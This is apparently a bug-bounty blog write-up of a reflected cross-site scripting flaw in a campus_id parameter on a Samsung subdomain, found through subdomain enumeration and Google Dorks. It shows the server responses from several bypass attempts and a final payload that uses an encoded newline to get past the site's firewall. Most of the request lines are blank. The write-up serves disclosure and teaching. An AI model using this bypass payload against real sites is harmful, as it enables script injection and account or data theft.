Like what I do before it, searching for a subdomain with sublist3r and check HTTP code on the subdomain that I found.
I use Google Dorks too, to find some interesting URL.
Until I try this Google Dork:
- site:sgsg.samsung.com
When I'm using Google Dork above, I found this URL
the source code shows every value from campus_id parameter.
Request:
Response:
- <script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "Oxford";
...
I try with a simple injection.
Request:
Response:
- <script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "Oxford\"";
...
We can't use quotes,
I try with a JavaScript tag.
Request:
Response:
- <script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "</script>";
...
Bam!! the server does not block my request.
Next steps.
Request:
Response:
- [blocked]
I try with other HTML tags to make XSS and the server blocks every my request too.
and then I think we can use the script tags.
Request:
Response:
- [blocked]
Again? hmmm..
I think server block the request when detecting tag script or something else.
Time to bypass it.
#Bypass 1
Request:
Response:
- [blocked]
#Bypass 2
Request:
Response:
- [blocked]
#Bypass 3
Request:
Response:
- [blocked]
#Bypass 4
Request:
Response:
- [blocked]
#Bypass 5
Request:
Response:
- <script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "</script><script/
<k>alert`1`//";
...
**Success**
With %0A or URL encode of a new line, we can bypass WAF on Samsung.
Screenshot:
#HappyHacking
0 comments